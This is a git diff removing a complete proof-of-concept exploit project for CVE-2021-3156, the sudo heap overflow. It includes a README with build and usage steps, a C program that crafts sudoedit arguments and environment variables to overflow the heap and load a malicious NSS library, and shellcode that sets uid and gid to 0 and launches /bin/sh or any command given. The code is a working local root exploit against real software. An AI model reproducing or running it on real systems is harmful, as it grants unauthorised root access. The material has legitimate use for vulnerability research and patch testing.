diff --git a/CVE-2021-3156/Makefile b/CVE-2021-3156/Makefile
deleted file mode 100644
index c1b1fa05272e10b939fe1eefb86f0682328bd7b0..0000000000000000000000000000000000000000
--- a/CVE-2021-3156/Makefile
+++ /dev/null
@@ -1,11 +0,0 @@
-all: shellcode exploit
-
-shellcode: shellcode.c
- mkdir libnss_x
- $(CC) -O3 -shared -nostdlib -o libnss_x/x.so.2 shellcode.c
-
-exploit: exploit.c
- $(CC) -O3 -w -o exploit exploit.c
-
-clean:
- rm -rf libnss_x exploit
diff --git a/CVE-2021-3156/README.md b/CVE-2021-3156/README.md
deleted file mode 100644
index fcd7ce961a8e89e2ba0636ae08648c9ce8f15d8d..0000000000000000000000000000000000000000
--- a/CVE-2021-3156/README.md
+++ /dev/null
@@ -1,30 +0,0 @@
-# CVE-2021-3156
-
-![2021-02-10-02-18-07](images/450acf1a2f14793aafa987905b20eeba.png)
-
-> This is a warehouse modification based on [@CptGibbon](https://github.com/CptGibbon/CVE-2021-3156 ) and supports arbitrary command execution.
-
-相关阅读:[CVE-2021-3156 - Exploit修改](https://payloads.online/archivers/2021-02-09/1)
-
-#### Root shell PoC for CVE-2021-3156 (no bruteforce)
-
-For educational purposes etc.
-
-Tested on :
-
-- @CptGibbon Ubuntu 20.04 against sudo 1.8.31
-- @Rvn0xsy Ubuntu 17.10
-
-All research credit: **Qualys Research Team**
-Check out the details on their [blog](https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit).
-
-You can check your version of sudo is vulnerable with: `$ sudoedit -s Y`.
-If it asks for your password it's most likely vulnerable, if it prints usage information it isn't.
-You can downgrade to the vulnerable version on Ubuntu 20.04 for testing purposes with `$ sudo apt install sudo=1.8.31-1ubuntu1`
-
-#### Usage
-
-`$ make`
-
-`$ ./exploit "Command"`
-
diff --git a/CVE-2021-3156/exploit.c b/CVE-2021-3156/exploit.c
deleted file mode 100644
index 354632e0cab944cec8738366a63e1fd3ba725a1f..0000000000000000000000000000000000000000
--- a/CVE-2021-3156/exploit.c
+++ /dev/null
@@ -1,108 +0,0 @@
-#include // execve()
-#include // strcat()
-#include
-
-/* Exploit for CVE-2021-3156, drops a root shell.
- * All credit for original research: Qualys Research Team.
- * https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit
- *
- * Tested on Ubuntu 20.04 against sudo 1.8.31
- * Author: Max Kamper
- */
-
-
-
-int main(int argc, char * argv[]) {
-
- if(argc < 2){
- printf("Usage: %s \n",argv[0]);
- printf("[+]Refrence : @Qualys Research Team @Max Kamper \n");
- printf("[+]Modify by Rvn0xsy@ https://payloads.online\n");
- return 0;
- }
- char * input_command = argv[1];
- int nSize = strlen(input_command)+6;
-
- char * command = malloc(nSize);
- memset(command,0x00,nSize);
- sprintf(command,"test\n\n%s\n",input_command);
- // 'buf' size determines size of overflowing chunk.
- // This will allocate an 0xf0-sized chunk before the target service_user struct.
- int i;
- char buf[0xf0] = {0};
- memset(buf, 'Y', 0xe0);
- strcat(buf, "\\");
-
- char* sudoedit_argv[] = {
- "sudoedit",
- "-S",
- "-s",
- buf,
- NULL};
-
- // Use some LC_ vars for heap Feng-Shui.
- // This should allocate the target service_user struct in the path of the overflow.
- char messages[0xe0] = {"LC_MESSAGES=en_GB.UTF-8@"};
- memset(messages + strlen(messages), 'A', 0xb8);
-
- char telephone[0x50] = {"LC_TELEPHONE=C.UTF-8@"};
- memset(telephone + strlen(telephone), 'A', 0x28);
-
- char measurement[0x50] = {"LC_MEASUREMENT=C.UTF-8@"};
- memset(measurement + strlen(measurement), 'A', 0x28);
-
- // This environment variable will be copied onto the heap after the overflowing chunk.
- // Use it to bridge the gap between the overflow and the target service_user struct.
- char overflow[0x500] = {0};
- memset(overflow, 'X', 0x4cf);
- strcat(overflow, "\\");
-
- // Overwrite the 'files' service_user struct's name with the path of our shellcode library.
- // The backslashes write nulls which are needed to dodge a couple of crashes.
- char* envp[] = {
- overflow,
- "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
- "XXXXXXX\\",
- "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
- "\\", "\\", "\\", "\\", "\\", "\\", "\\",
- "x/x\\",
- "Z",
- messages,
- telephone,
- measurement,
- NULL};
-
- // Invoke sudoedit with our argv & envp.
-
- int des_p[2];
- if(pipe(des_p) == -1){
-
- puts("Error .. pipe \n");
- return -1;
- }
-
- if(fork() == 0) //first fork
- {
- close(STDOUT_FILENO); //closing stdout
- dup(des_p[1]); //replacing stdout with pipe write
- close(des_p[0]); //closing pipe read
- write(des_p[1],command, strlen(command));
- close(des_p[1]);
- exit(1);
- }
-
- if(fork()==0){
- close(STDIN_FILENO); //closing stdin
- dup(des_p[0]); //replacing stdin with pipe read
- close(des_p[1]); //closing pipe write
- close(des_p[0]);
-
- execve("/usr/bin/sudoedit", sudoedit_argv, envp);
- perror("execvp of stdread failed");
- exit(1);
- }
- close(des_p[0]);
- close(des_p[1]);
- wait(0);
- wait(0);
-}
diff --git a/CVE-2021-3156/images/450acf1a2f14793aafa987905b20eeba.png b/CVE-2021-3156/images/450acf1a2f14793aafa987905b20eeba.png
deleted file mode 100644
index 3bfa8aa6c8fca049ec5ca5e3d29dc6fb70074c5d..0000000000000000000000000000000000000000
Binary files a/CVE-2021-3156/images/450acf1a2f14793aafa987905b20eeba.png and /dev/null differ
diff --git a/CVE-2021-3156/shellcode.c b/CVE-2021-3156/shellcode.c
deleted file mode 100644
index 367a918f2b5461d33eb497476c90eb59ed4d3376..0000000000000000000000000000000000000000
--- a/CVE-2021-3156/shellcode.c
+++ /dev/null
@@ -1,34 +0,0 @@
-static void __attribute__((constructor)) _init(void) {
- __asm __volatile__(
- "addq $64, %rsp;"
- // setuid(0);
- "movq $105, %rax;"
- "movq $0, %rdi;"
- "syscall;"
-
-
- // setgid(0);
- "movq $106, %rax;"
- "movq $0, %rdi;"
- "syscall;"
-
-
- // execve("/bin/sh");
- "movq $59, %rax;"
- "movq $0x0068732f6e69622f, %rdi;"
- "pushq %rdi;"
- "movq %rsp, %rdi;"
- "movq $0, %rdx;"
- "pushq %rdx;"
- "pushq %rdi;"
- "movq %rsp, %rsi;"
- "syscall;"
-
-
- // exit(0);
- "movq $60, %rax;"
- "movq $0, %rdi;"
- "syscall;"
-
-);
-}